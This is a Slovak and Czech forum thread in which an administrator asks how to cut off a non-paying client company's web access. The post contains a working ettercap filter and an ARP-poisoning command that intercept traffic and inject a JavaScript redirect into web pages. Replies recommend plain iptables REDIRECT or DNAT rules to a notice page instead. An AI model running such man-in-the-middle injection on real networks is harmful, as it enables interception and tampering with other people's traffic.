Bic na neplaticov --- ettercap filter

Potrebujem spravit redirect http traficu u jednej neplatiacej firmy. Nastastie pre mna im ide cely trafic cez linux router, takze som sa rozhodol v prvom kole im znefunkcnit prehliace redirectom celeho http traficu.

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
msg("changed Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("<BODY", "&#x000D<BODY onload=\"javascript:document.location.href='ip routra'\"><XSS a=");
replace("<body", "&#x000D<body onload=\"javascript:document.location.href='ip routra'\"><XSS a=");
msg("Filter Ran.\n");
}

Nakolko som rodeny antikoder a s ettercapom som sa hral naposledy pred 9-10 rokmi asi nie som si isty spravnostou filtra a jeho naslednym pouzitim.

Este doplnim, vytvoreny filter som "skompiloval" do tvaru zrozumitelneho ettercapu a spustil samotny ettercap.

ettercap -T -Q -M arp:remote // // -F /etc/filter.ef

Předmět	Autor	Datum
Mně to přijde strašně složité. :-) Já bych to vyřešil (když už je to router) přímo v iptables, pomo… touchwood 16.04.2010 07:44	touchwood	16.04.2010 07:44
Vcera som sa zastavil vecer na #linux-sk a tam sa ma tiez pytali, ze preco to riesim tak zlozito. Pa… fleg-sk 16.04.2010 09:04	fleg-sk	16.04.2010 09:04
Tak ettercap vlastne vypnutim forwardingu znefunkcnil prechod do netu uplne a nic sa nezobrazovalo,… fleg 16.04.2010 12:28	fleg	16.04.2010 12:28
A jak to máš vyřešeno by iptables? Dík. resul 30.06.2010 18:04	resul	30.06.2010 18:04
vždyť to máš napsané nahoře.. máš 2 varianty: - lokální "you-got-banned" web server: -j REDIRECT n… touchwood 30.06.2010 19:19	touchwood	30.06.2010 19:19
/usr/sbin/iptables -I PREROUTING -t nat -p tcp -s 10.100.0.2 --dport 80 -j DNAT --to 10.100.0.1:999… poslední fleg 30.06.2010 19:31	fleg	30.06.2010 19:31

Mně to přijde strašně složité.

Já bych to vyřešil (když už je to router) přímo v iptables, pomocí -j REDIRECT a nasměrováním na nějaký malý lokální http démon/proxy

Vcera som sa zastavil vecer na #linux-sk a tam sa ma tiez pytali, ze preco to riesim tak zlozito.
Paradoxom je, ze na svojej sieti mam neplaticov riesenych prave cez iptables, takze nechapem preco som sa trapil s ettercapom.
Vlastne asi viem, povodne som si myslel, ze linux je na sieti len ako pc so sambou az neskor som zistil, ze je to vlastne router a za nim je uz len to dslko, takze iptables boli ta spravna volba. V kazdom pripade toto je univerzalnejsie riesenie aj pre siet, kde nedisponujeme routrom, ale napr len masinou so sambou bez moznosti routovania.
9:03 z firmy sa nikto neozval, prisla len sms z neznameho cisla so smajlikom, takze doteraz neviem ci to funguje, v kazdom pripade im net nejde, pretoze ettercap vypina automaticky ip_forwarding (neviem sice preco).

Tak ettercap vlastne vypnutim forwardingu znefunkcnil prechod do netu uplne a nic sa nezobrazovalo, takze som sa musel nakoniec uchylit k iptables, ktore bezia spolahlivo.

A jak to máš vyřešeno by iptables? Dík.

vždyť to máš napsané nahoře..

máš 2 varianty:

- lokální "you-got-banned" web server: -j REDIRECT na všechna spojení směrem do netu na port 80 a 443
- ne-lokální (tj. někde u sebe) "you-got-banned" webserver: - DNAT na všechna spojení do netu na port 80 a 443

Je to prosté, ale účinné, pokud se navíc zakážou i ostatní porty, aby nešlo použít vnějších proxy, je to na 100% účinné.

/usr/sbin/iptables -I PREROUTING -t nat -p tcp -s 10.100.0.2 --dport 80 -j DNAT --to 10.100.0.1:999

Neplatic 10.100.0.2 ktory chce ist na net musi preroutovat cez router a ten, ked zisti, ze sa chysta napojit niekam na port 80 presmeruje ho na router(10.100.0.1) port 999. Na porte 999 pocuva superdemon a ten spusta takyto skript 999 stream tcp nowait nobody /bin/echo /bin/echo Nezaplatili ste za pouzivanie sluzieb. Volajte.

V pripade, ze mas niekde umiestneny web server mozes pouzit presmerovanie nan, takze namiesto portu 999 pouzijes 80. Ja uz mam webserver obsadeny, takze som vyuzil sluzieb superdemona.

Zpět do poradny Odpovědět na původní otázku Nahoru